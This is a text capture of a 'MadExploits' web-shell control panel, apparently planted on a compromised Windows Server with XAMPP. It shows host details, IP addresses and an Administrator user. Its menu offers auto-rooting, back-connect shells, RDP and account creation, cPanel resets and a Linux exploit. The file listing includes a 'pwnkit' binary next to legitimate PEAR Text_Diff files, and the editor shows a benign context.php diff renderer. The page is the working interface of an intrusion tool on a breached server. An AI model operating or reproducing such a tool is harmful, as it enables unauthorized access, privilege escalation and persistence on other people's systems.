Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.124
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
php /
pear /
Text /
Diff /
Renderer /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
context.php
1.72
KB
-rw-rw-rw-
inline.php
4.65
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
unified.php
1.45
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : context.php
<?php /** * "Context" diff renderer. * * This class renders the diff in classic "context diff" format. * * $Horde: framework/Text_Diff/Diff/Renderer/context.php,v 1.3.2.4 2009/01/06 15:23:42 jan Exp $ * * Copyright 2004-2009 The Horde Project (http://www.horde.org/) * * See the enclosed file COPYING for license information (LGPL). If you did * not receive this file, see http://opensource.org/licenses/lgpl-license.php. * * @package Text_Diff */ /** Text_Diff_Renderer */ require_once 'Text/Diff/Renderer.php'; /** * @package Text_Diff */ class Text_Diff_Renderer_context extends Text_Diff_Renderer { /** * Number of leading context "lines" to preserve. */ var $_leading_context_lines = 4; /** * Number of trailing context "lines" to preserve. */ var $_trailing_context_lines = 4; var $_second_block = ''; function _blockHeader($xbeg, $xlen, $ybeg, $ylen) { if ($xlen != 1) { $xbeg .= ',' . $xlen; } if ($ylen != 1) { $ybeg .= ',' . $ylen; } $this->_second_block = "--- $ybeg ----\n"; return "***************\n*** $xbeg ****"; } function _endBlock() { return $this->_second_block; } function _context($lines) { $this->_second_block .= $this->_lines($lines, ' '); return $this->_lines($lines, ' '); } function _added($lines) { $this->_second_block .= $this->_lines($lines, '+ '); return ''; } function _deleted($lines) { return $this->_lines($lines, '- '); } function _changed($orig, $final) { $this->_second_block .= $this->_lines($final, '! '); return $this->_lines($orig, '! '); } }
Close